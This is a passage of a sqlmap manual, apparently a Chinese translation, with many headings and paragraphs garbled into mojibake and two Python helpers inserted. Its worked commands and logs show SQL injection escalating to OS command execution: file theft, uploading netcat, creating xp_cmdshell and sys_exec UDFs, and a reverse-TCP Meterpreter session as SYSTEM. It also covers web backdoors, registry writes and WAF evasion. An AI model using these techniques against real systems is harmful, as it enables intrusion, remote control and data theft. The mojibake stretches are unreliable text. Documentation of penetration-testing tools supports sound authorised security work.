杩愯鑷畾涔夌殑SQL璇彞

鍙傛暟锛�--sql-query,--sql-shell

sqlmap浼氳嚜鍔ㄦ娴嬬‘瀹氫娇鐢ㄥ摢绉峉QL娉ㄥ叆鎶�鏈紝濡備綍鎻掑叆妫�绱㈣鍙ャ��

濡傛灉鏄疭ELECT鏌ヨ璇彞锛宻qlap灏嗕細杈撳嚭缁撴灉銆傚鏋滄槸閫氳繃SQL娉ㄥ叆鎵ц鍏朵粬璇彞锛岄渶瑕佹祴璇曟槸鍚︽敮鎸佸璇彞鎵цSQL璇彞銆�

鍒椾妇涓�涓狹ircrosoft SQL Server 2000鐨勪緥瀛愶細

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query "SELECT 'foo'" -v 1
[...]
[hh:mm:14] [INFO] fetching SQL SELECT query output: 'SELECT 'foo''
[hh:mm:14] [INFO] retrieved: foo
SELECT 'foo':    'foo'

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query "SELECT 'foo', 'bar'" -v 2
[...]
[hh:mm:50] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar''
[hh:mm:50] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it into
distinct queries to be able to retrieve the output even if we are going blind
[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)),
(CHAR(32)))
[hh:mm:50] [INFO] retrieved: foo
[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds
[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(98)+CHAR(97)+CHAR(114)) AS VARCHAR(8000)),
(CHAR(32)))
[hh:mm:50] [INFO] retrieved: bar
[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds
SELECT 'foo', 'bar':    'foo, bar'

Brute forcing

Brute-forcing table names

Parameter: --common-tables

Use this parameter when --tables cannot retrieve the database's tables.

This is usually the case when:

1. The MySQL version is below 5.0, so there is no information_schema.

2. The database is Microsoft Access and the MSysObjects system table is not readable (the default).

3. The current user has no permission to read the system tables that store the data structure.

The table names to try are in txt/common-tables.txt; you can add your own.

A MySQL 4.1 example:

$ python sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --common-tables -D testdb --banner
[...]
[hh:mm:39] [INFO] testing MySQL
[hh:mm:39] [INFO] confirming MySQL
[hh:mm:40] [INFO] the back-end DBMS is MySQL
[hh:mm:40] [INFO] fetching banner
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS operating system: Windows
back-end DBMS: MySQL < 5.0.0
banner:    '4.1.21-community-nt'
[hh:mm:40] [INFO] checking table existence using items from '/software/sqlmap/txt/common-tables.txt'
[hh:mm:40] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 8
[hh:mm:43] [INFO] retrieved: users
Database: testdb
[1 table]
+-------+
| users |
+-------+

Brute-forcing column names

Parameter: --common-columns

Works like table-name brute forcing; the column names tried are in txt/common-columns.txt.

User-defined function injection

Parameters: --udf-inject, --shared-lib

You can inject your own compiled user-defined functions (UDFs) into MySQL or PostgreSQL as a shared library (a DLL on Windows or a shared object on Linux/Unix). sqlmap asks you some questions, uploads the user-defined functions to the database server, executes them according to your choices, and removes them again when the injection is finished.

System file operations

Reading files from the database server

Parameter: --file-read

This works when the database is MySQL, PostgreSQL or Microsoft SQL Server and the current user has permission to use the required functions. The file read can be text or binary.

A Microsoft SQL Server 2005 example:

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther" \
--file-read "C:/example.exe" -v 1
[...]
[hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[hh:mm:50] [INFO] fetching file: 'C:/example.exe'
[hh:mm:50] [INFO] the SQL query provided returns 3 entries
C:/example.exe file saved to:    '/software/sqlmap/output/192.168.136.129/files/C__example.exe'
[...]

$ ls -l output/192.168.136.129/files/C__example.exe
-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C__example.exe

$ file output/192.168.136.129/files/C__example.exe
output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel
80386 32-bit

Uploading files to the database server

Parameters: --file-write, --file-dest

This works when the database is MySQL, PostgreSQL or Microsoft SQL Server and the current user has permission to use the required functions. The uploaded file can be text or binary.

A MySQL example:

$ file /software/nc.exe.packed
/software/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32-bit

$ ls -l /software/nc.exe.packed
-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /software/nc.exe.packed

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write \
"/software/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1
[...]
[hh:mm:29] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or 2008
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: MySQL >= 5.0.0
[...]
do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully
written on the back-end DBMS file system? [Y/n] y
[hh:mm:52] [INFO] retrieved: 31744
[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 bytes,
same size as the local file '/software/nc.exe.packed'

Running arbitrary operating system commands

Parameters: --os-cmd, --os-shell

This works when the database is MySQL, PostgreSQL or Microsoft SQL Server and the current user has permission to use the required functions.

For MySQL and PostgreSQL, sqlmap uploads a binary library containing the user-defined functions sys_exec() and sys_eval().

The two functions it creates can then execute system commands. For Microsoft SQL Server, sqlmap uses the xp_cmdshell stored procedure; if it is disabled (the default on Microsoft SQL Server 2005 and later), sqlmap re-enables it, and if it does not exist, sqlmap creates it automatically.

A PostgreSQL example:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" \
--os-cmd id -v 1
[...]
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: PostgreSQL
[hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:12] [INFO] the back-end DBMS operating system is Linux
[hh:mm:12] [INFO] testing if current user is DBA
[hh:mm:12] [INFO] detecting back-end DBMS version from its banner
[hh:mm:12] [INFO] checking if UDF 'sys_eval' already exist
[hh:mm:12] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:12] [INFO] creating UDF 'sys_eval' from the binary UDF file
[hh:mm:12] [INFO] creating UDF 'sys_exec' from the binary UDF file
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:    'uid=104(postgres) gid=106(postgres) groups=106(postgres)'
[hh:mm:19] [INFO] cleaning up the database management system
do you want to remove UDF 'sys_eval'? [Y/n] y
do you want to remove UDF 'sys_exec'? [Y/n] y
[hh:mm:23] [INFO] database management system cleanup finished
[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can
only be deleted manually

--os-shell can also simulate a real shell in which you enter the commands you want to run.

When stacked queries cannot be executed (for example a PHP or ASP application whose back-end database is MySQL), it may still be possible to use INTO OUTFILE to write into a writable directory and create a web backdoor. Supported languages:

1. ASP

2. ASP.NET

3. JSP

4. PHP

Working with Meterpreter

Parameters: --os-pwn, --os-smbrelay, --os-bof, --priv-esc, --msf-path, --tmp-path

When the database is MySQL, PostgreSQL or Microsoft SQL Server and the current user has permission to use the required functions, a TCP connection can be established directly between the database and the attacker; the connection can be an interactive command line or a Meterpreter session. sqlmap generates the shellcode with Metasploit and has four ways of executing it:

1. Executing the Metasploit shellcode in memory through the user-defined sys_bineval() function; supports MySQL and PostgreSQL; parameter: --os-pwn.

2. Uploading a stand-alone payload and executing it through a user-defined function: sys_exec() for MySQL and PostgreSQL, xp_cmdshell() for Microsoft SQL Server; parameter: --os-pwn.

3. Executing the Metasploit shellcode through an SMB attack (MS08-068) when the privileges sqlmap has obtained are high enough (uid=0 on Linux/Unix, Administrator on Windows); parameter: --os-smbrelay.

4. Executing the Metasploit payload in memory by overflowing the sp_replwritetovarbin stored procedure of Microsoft SQL Server 2000 and 2005 (MS09-004); parameter: --os-bof.

A MySQL example:

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?id=1" --os-pwn --msf-path /software/metasploit
[...]
[hh:mm:31] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:31] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
>
[hh:mm:32] [INFO] testing if current user is DBA
[hh:mm:32] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
>
[hh:mm:33] [INFO] checking if UDF 'sys_bineval' already exist
[hh:mm:33] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:33] [INFO] detecting back-end DBMS version from its banner
[hh:mm:33] [INFO] retrieving MySQL base directory absolute path
[hh:mm:34] [INFO] creating UDF 'sys_bineval' from the binary UDF file
[hh:mm:34] [INFO] creating UDF 'sys_exec' from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database underlying
operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
>
[hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports
between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
>
which is the local address? [192.168.136.1]
which local port number do you want to use? [60641]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
>
[hh:mm:40] [INFO] creation in progress ... done
[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait..

                                 _
                                 | |      o
 _  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                                     /|
                                     \|

=[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 674 exploits - 351 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12272 updated 4 days ago (2011.04.07)

PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => thread
LPORT => 60641
LHOST => 192.168.136.1
[*] Started reverse handler on 192.168.136.1:60641
[*] Starting the payload handler...
[hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval',
please wait..
[*] Sending stage (749056 bytes) to 192.168.136.129
[*] Meterpreter session 1 opened (192.168.136.1:60641 -> 192.168.136.129:1689) at Mon Apr 11
hh:mm:52 +0100 2011
meterpreter > Loading extension espia...success.
meterpreter > Loading extension incognito...success.
meterpreter > [-] The 'priv' extension has already been loaded.
meterpreter > Loading extension sniffer...success.
meterpreter > System Language : en_US
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Computer        : W2K3R2
Architecture    : x86
Meterpreter     : x86/win32
meterpreter > Server username: NT AUTHORITY\SYSTEM
meterpreter > ipconfig
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0
Intel(R) PRO/1000 MT Network Connection
Hardware MAC: 00:0c:29:fc:79:39
IP Address  : 192.168.136.129
Netmask     : 255.255.255.0
meterpreter > exit
[*] Meterpreter session 1 closed.  Reason: User exit

榛樿鎯呭喌涓婱ySQL鍦╓indows涓婁互SYSTEM鏉冮檺杩愯锛孭ostgreSQL鍦╓indows涓嶭inux涓槸浣庢潈闄愯繍琛岋紝Microsoft SQL Server 2000榛樿鏄互SYSTEM鏉冮檺杩愯锛孧icrosoft SQL Server 2005涓�2008澶ч儴鍒嗘槸浠ETWORK SERVICE鏈夋椂鏄疞OCAL SERVICE銆�

瀵筗indows娉ㄥ唽琛ㄦ搷浣�

褰撴暟鎹簱涓篗ySQL锛孭ostgreSQL鎴朚icrosoft SQL Server锛屽苟涓斿綋鍓峸eb搴旂敤鏀寔鍫嗘煡璇€�� 褰撶劧锛屽綋鍓嶈繛鎺ユ暟鎹簱鐨勭敤鎴蜂篃闇�瑕佹湁鏉冮檺鎿嶄綔娉ㄥ唽琛ㄣ��

璇诲彇娉ㄥ唽琛ㄥ��

鍙傛暟锛�--reg-read

鍐欏叆娉ㄥ唽琛ㄥ��

鍙傛暟锛�--reg-add

鍒犻櫎娉ㄥ唽琛ㄥ��

鍙傛暟锛�--reg-del

娉ㄥ唽琛ㄨ緟鍔╅�夐」

鍙傛暟锛�--reg-key锛�--reg-value锛�--reg-data锛�--reg-type

闇�瑕侀厤鍚堜箣鍓嶄笁涓弬鏁颁娇鐢紝渚嬪瓙锛�

$ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --reg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1

General parameters

Reading the session from SQLite

Parameter: -s

sqlmap automatically generates a SQLite file under the output path for every target; if the user wants to specify the path of the file to read, this parameter does it.

Saving HTTP(S) logs

Parameter: -t

This parameter takes a text file; sqlmap saves the log of HTTP(S) requests and responses there.

Non-interactive mode

Parameter: --batch

With this parameter no user input is needed; sqlmap keeps running using the default values of its prompts.

Forcing a character encoding

Parameter: --charset

Instead of the character encoding sqlmap detects automatically (e.g. from the Content-Type HTTP header), force one, e.g.:

--charset=GBK

Crawling website URLs

Parameter: --crawl

sqlmap can collect links that may potentially be vulnerable; the value that follows is the crawl depth.

Example:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/" --batch --crawl=3
[...]
[xx:xx:53] [INFO] starting crawler
[xx:xx:53] [INFO] searching for links with depth 1
[xx:xx:53] [WARNING] running in a single-thread mode. This could take a while
[xx:xx:53] [INFO] searching for links with depth 2
[xx:xx:54] [INFO] heuristics detected web page charset 'ascii'
[xx:xx:00] [INFO] 42/56 links visited (75%)
[...]

Setting the delimiter for CSV output

Parameter: --csv-del

When the dump is saved in CSV format (--dump-format=CSV), a delimiter is needed; the default is a comma, and the user can change it, e.g.:

--csv-del=";"

DBMS authentication

Parameter: --dbms-cred

Sometimes the current user's privileges are insufficient and certain operations fail. If you know a higher-privileged user's password you can use this parameter; some databases have a dedicated mechanism for switching users, such as the OPENROWSET function in Microsoft SQL Server.

Defining the dump format

Parameter: --dump-format

The output format can be defined as CSV, HTML or SQLITE.

Estimating the completion time

Parameter: --eta

Calculates the remaining time for retrieving the injected data.

For example, an Oracle boolean-based blind injection:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id=1" -b --eta
[...]
[hh:mm:01] [INFO] the back-end DBMS is Oracle
[hh:mm:01] [INFO] fetching banner
[hh:mm:01] [INFO] retrieving the length of query output
[hh:mm:01] [INFO] retrieved: 64
17% [========>                                          ] 11/64  ETA 00:19

Then:

100% [===================================================] 64/64
[hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Oracle
banner:    'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'

sqlmap first outputs the length, then the estimated completion time and a percentage, and then outputs the characters.

Flushing the session file

Parameter: --flush-session

If you do not want to use the previously cached session file for this target, use this parameter. It clears the previous session and re-tests the target.

Automatically testing forms

Parameter: --forms

If you want to test the parameters of a form on a page, you can read a request file with -r or test them through --data. With --forms, however, sqlmap automatically fetches the forms from the page at the -u URL and tests them.

Ignoring the query results stored in the session file

Parameter: --fresh-queries

Ignores the queries saved in the session file and queries again.

Using the DBMS hex function

Parameter: --hex

Sometimes character-encoding problems can cause data loss; the hex function can be used to avoid that:

PostgreSQL example:

$ python sqlmap.py -u "http://192.168.48.130/sqlmap/pgsql/get_int.php?id=1" --banner --hex -v 3 --parse-errors

[...]

[xx:xx:14] [INFO] fetching banner

[xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC)

[xx:xx:15] [INFO] parsed error message: 'pg_query() [function.pg-query]: Query failed: ERROR:  invalid input syntax for type numeric: ":vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c202844656269616e2032e332e322d312e312920342e332e32:nxb:" in /var/www/sqlmap/libs/pgsql.inc.php on line 35'

[xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled by

GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2

[...]

鑷畾涔夎緭鍑虹殑璺緞

鍙傛暟锛�--output-dir

sqlmap榛樿鎶妔ession鏂囦欢璺熺粨鏋滄枃浠朵繚瀛樺湪output鏂囦欢澶逛笅锛岀敤姝ゅ弬鏁板彲鑷畾涔夎緭鍑鸿矾寰� 渚嬪锛�--output-dir=/tmp

Parse DBMS error messages from responses

Option: --parse-errors

Sometimes the target has not disabled DBMS error reporting, so a failing SQL statement produces an error message in the response. With this option sqlmap parses and displays those error messages.

$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --parse-errors

[...]

[11:12:17] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test

[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)

[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number of items in the select list.

/sqlmap/mssql/iis/get_int.asp, line 27'

[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)

[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of items in the select list.

/sqlmap/mssql/iis/get_int.asp, line 27'

[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)

[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of items in the select list.

/sqlmap/mssql/iis/get_int.asp, line 27'

[11:12:17] [INFO] target URL appears to have 3 columns in query

[...]
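To see what parsed error messages like the two above actually give away, here is an added example from a log-review point of view; it is not part of this manual and not sqlmap's own code. It decodes the marker-delimited hex blob that --hex embeds in a PostgreSQL error, and derives the column-count bound that the ORDER BY errors reveal; the log excerpt is constructed, modelled on the output shown above.

```python
import re

# Constructed log excerpt modelled on the two --parse-errors examples above.
# The hex blob is kept short on purpose: it decodes to "PostgreSQL 8.3.9".
SAMPLE_LOG = """\
[xx:xx:15] [INFO] parsed error message: 'pg_query(): Query failed: ERROR:  invalid input syntax for type numeric: ":vtj:506f737467726553514c20382e332e39:nxb:" in /var/www/app/pgsql.inc.php on line 35'
[11:12:17] [INFO] parsed error message: 'The ORDER BY position number 10 is out of range of the number of items in the select list.'
[11:12:17] [INFO] parsed error message: 'The ORDER BY position number 6 is out of range of the number of items in the select list.'
[11:12:17] [INFO] parsed error message: 'The ORDER BY position number 4 is out of range of the number of items in the select list.'
"""

# sqlmap brackets error-based output with two random three-letter markers,
# e.g. ":vtj:<hex>:nxb:" in the PostgreSQL example above.
MARKER_RE = re.compile(r":([a-z]{3}):([0-9a-fA-F]*):([a-z]{3}):")
ORDER_BY_RE = re.compile(r"ORDER BY position number (\d+) is out of range")


def decode_hex_markers(log_text):
    """Return the strings leaked through marker-delimited hex blobs.

    With --hex the DBMS output is hex-encoded before it lands in the error
    message; decoding shows exactly what the response revealed. A blob with
    an odd number of digits (cut off by the error-message length limit) is
    reported as undecodable instead of being silently dropped.
    """
    leaked = []
    for _open, hexblob, _close in MARKER_RE.findall(log_text):
        try:
            leaked.append(bytes.fromhex(hexblob).decode("utf-8", "replace"))
        except ValueError:
            leaked.append("<undecodable: %d hex digits>" % len(hexblob))
    return leaked


def max_column_count(log_text):
    """Upper bound on the SELECT column count implied by ORDER BY errors.

    'ORDER BY position number N is out of range' means the query has fewer
    than N columns, so the smallest failing N minus one is the bound sqlmap
    reports ('appears to have 3 columns' in the MSSQL example above).
    Returns None when no such error was logged.
    """
    failing = [int(n) for n in ORDER_BY_RE.findall(log_text)]
    return min(failing) - 1 if failing else None
```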

Other options

Use option abbreviations

Option: -z

When the option list gets too long and complicated you can use the mnemonic (abbreviated) mode. For example:

python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "www.target.com/vuln.php?id=1"

鍙互鍐欐垚锛�

python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=1"

And:

python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testdb -T users -u "www.target.com/vuln.php?id=1"

鍙互鍐欐垚锛�

python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.com/vuln.php?id=1"
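How a mnemonic string like the ones above can be resolved is shown by this added example. It is not sqlmap's own lookup code but an independent re-implementation over a constructed subset of the option table; it assumes dash-stripped prefix matching where an exact name wins, and it also covers the failure mode the manual does not mention: an abbreviation that matches several options is rejected as ambiguous rather than guessed.

```python
# Constructed subset of sqlmap's options: name -> whether it takes a value.
# Assumption: long options match by prefix on their dash-stripped names (an
# exact name beats longer ones), single-letter short options match exactly.
LONG_OPTIONS = {
    "batch": False, "random-agent": False, "ignore-proxy": False,
    "technique": True, "flush-session": False, "dump": False,
    "dump-all": False, "dump-format": True, "dbs": False, "users": False,
}
SHORT_OPTIONS = {"D": True, "T": True, "C": True}


def expand_mnemonics(spec):
    """Expand a -z mnemonic string into an argv-style list of options."""
    argv = []
    for item in spec.split(","):
        name, sep, value = item.partition("=")
        if name in SHORT_OPTIONS:
            takes_value, flag = SHORT_OPTIONS[name], "-" + name
        else:
            key = name.replace("-", "")
            candidates = [o for o in LONG_OPTIONS
                          if o.replace("-", "").startswith(key)]
            exact = [o for o in candidates if o.replace("-", "") == key]
            if exact:                      # "dump" must not be ambiguous
                candidates = exact
            if not candidates:
                raise ValueError("unknown mnemonic %r" % name)
            if len(candidates) > 1:
                raise ValueError("ambiguous mnemonic %r: %s"
                                 % (name, ", ".join(sorted(candidates))))
            takes_value = LONG_OPTIONS[candidates[0]]
            flag = "--" + candidates[0]
        if takes_value != bool(sep):
            raise ValueError("option %s %s a value"
                             % (flag, "requires" if takes_value else "does not take"))
        if not takes_value:
            argv.append(flag)
        elif flag.startswith("--"):
            argv.append("%s=%s" % (flag, value))
        else:
            argv.extend([flag, value])
    return argv


if __name__ == "__main__":
    print(" ".join(expand_mnemonics("bat,randoma,ign,tec=BEU")))
```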

Alert on successful SQL injection

Option: --alert

Set the answers to prompts

Option: --answers

When sqlmap would prompt for input, this option supplies your own answers automatically. Example:

$ python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1" --technique=E --answers="extending=N" --batch

[...]

[xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id'

heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y

[xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] N

[...]

Beep when an SQL injection is found

Option: --beep

Emits a beep when an SQL injection is found.

鍚彂寮忔娴媁AF/IPS/IDS淇濇姢

鍙傛暟锛�--check-waf

WAF/IPS/IDS淇濇姢鍙兘浼氬sqlmap閫犳垚寰堝ぇ鐨勫洶鎵帮紝濡傛灉鎬�鐤戠洰鏍囨湁姝ら槻鎶ょ殑璇濓紝鍙互浣跨敤姝ゅ弬鏁版潵娴嬭瘯銆� sqlmap灏嗕細浣跨敤涓�涓笉瀛樺湪鐨勫弬鏁版潵娉ㄥ叆娴嬭瘯

渚嬪锛�

&foobar=AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1

If protection is in place, the response will probably differ.

Clean up sqlmap's UDF(s) and tables

Option: --cleanup

Removes the UDFs and tables that sqlmap created during injection.

Disable coloured output

Option: --disable-coloring

sqlmap colours its output by default; this option turns colouring off.

Use a specific Google results page

Option: --gpage

By default sqlmap uses the first 100 URLs of the search results as injection targets; with this option the URLs from a specific results page can be tested.

Use HTTP parameter pollution

Option: --hpp

HTTP parameter pollution may bypass WAF/IPS/IDS protection mechanisms; it is particularly effective on ASP/IIS and ASP.NET/IIS platforms.

Test for WAF/IPS/IDS protection

Option: --identify-waf

sqlmap can try to identify the WAF/IPS/IDS protection in front of the target, which makes it easier for the user to work out how to get past it. Around 30 products are currently recognised.

For example, against a MySQL target protected by the ModSecurity WAF:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --identify-waf -v 3

[...]

[xx:xx:23] [INFO] testing connection to the target URL

[xx:xx:23] [INFO] heuristics detected web page charset 'ascii'

[xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'USP Secure Entry Server (United Security Providers)'

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'BinarySEC Web Application Firewall (BinarySEC)'

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)'

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Hyperguard Web Application Firewall (art of defence Inc.)'

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Cisco ACE XML Gateway (Cisco Systems)'

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'TrafficShield (F5 Networks)'

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)'

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KONA Security Solutions (Akamai Technologies)'

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Incapsula Web Application Firewall (Incapsula/Imperva)'

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'CloudFlare Web Application Firewall (CloudFlare)'

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Barracuda Web Application Firewall (Barracuda Networks)'

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'webApp.secure (webScurity)'

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Proventia Web Application Security (IBM)'

[xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1'

[xx:xx:23] [DEBUG] page not found (404)

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KS-WAF (Knownsec)'

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetScaler (Citrix Systems)'

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Jiasule Web Application Firewall (Jiasule)'

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'WebKnight Application Firewall (AQTRONIX)'

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'AppWall (Radware)'

[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)'

[xx:xx:23] [CRITICAL] WAF/IDS/IPS identified 'ModSecurity: Open Source Web Application Firewall (Trustwave)'. Please consider usage of tamper scripts (option '--tamper')

[...]

Imitate a smartphone

Option: --mobile

Some servers only accept requests from mobile clients; this option sets a smartphone User-Agent so that sqlmap appears to be a phone.

For example:

$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile

[...]

which smartphone do you want sqlmap to imitate through HTTP User-Agent header?

[1] Apple iPhone 4s (default)

[2] BlackBerry 9900

[3] Google Nexus 7

[4] HP iPAQ 6365

[5] HTC Sensation

[6] Nokia N97

[7] Samsung Galaxy S

> 1

[...]

Safely remove the files in the output directory

Option: --purge-output

Use this option when the result files need to be deleted in a way that cannot be recovered: the original files are overwritten with random data before removal.

For example:

$ python sqlmap.py --purge-output -v 3

[...]

[xx:xx:55] [INFO] purging content of directory '/home/user/sqlmap/output'...

[xx:xx:55] [DEBUG] changing file attributes

[xx:xx:55] [DEBUG] writing random data to files

[xx:xx:55] [DEBUG] truncating files

[xx:xx:55] [DEBUG] renaming filenames to random values

[xx:xx:55] [DEBUG] renaming directory names to random values

[xx:xx:55] [DEBUG] deleting the whole directory tree

[...]

鍚彂寮忓垽鏂敞鍏�

鍙傛暟锛�--smart

鏈夋椂瀵圭洰鏍囬潪甯稿鐨刄RL杩涜娴嬭瘯锛屼负鑺傜渷鏃堕棿锛屽彧瀵硅兘澶熷揩閫熷垽鏂负娉ㄥ叆鐨勬姤閿欑偣杩涜娉ㄥ叆锛屽彲浠ヤ娇鐢ㄦ鍙傛暟銆�

渚嬪瓙锛�

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart

[...]

[xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic

[xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic

[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable

[xx:xx:14] [INFO] skipping GET parameter 'ca'

